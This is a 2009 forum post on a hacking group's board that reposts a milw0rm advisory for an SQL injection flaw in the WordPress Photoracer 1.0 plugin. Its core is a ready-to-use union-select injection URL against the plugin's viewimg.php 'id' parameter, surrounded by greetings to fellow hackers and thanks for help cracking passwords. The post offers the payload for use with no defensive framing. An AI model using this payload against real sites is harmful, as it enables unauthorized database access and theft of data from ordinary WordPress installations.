Multi Ethnic Hacking Group


    WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability

    Post by Foxi on Wed Jul 08, 2009 4:20 am

    Code:
    Wordpress Photoracer Plugin => SQL injection
    http://wordpress.org/extend/plugins/photoracer/

    Author: Kacper
    Website: http://devilteam.pl/

    Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum,

    Pozdro: Ratman, Kopaczka, FDJ

    Elo: dla GLOBUSa za pomoc w crackowaniu hasel.

    Vuln:

    http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--

    big thanks str0ke for you!

    be safe all :)

    # milw0rm.com [2009-06-15]


      Current date/time is Tue Jul 25, 2017 12:46 am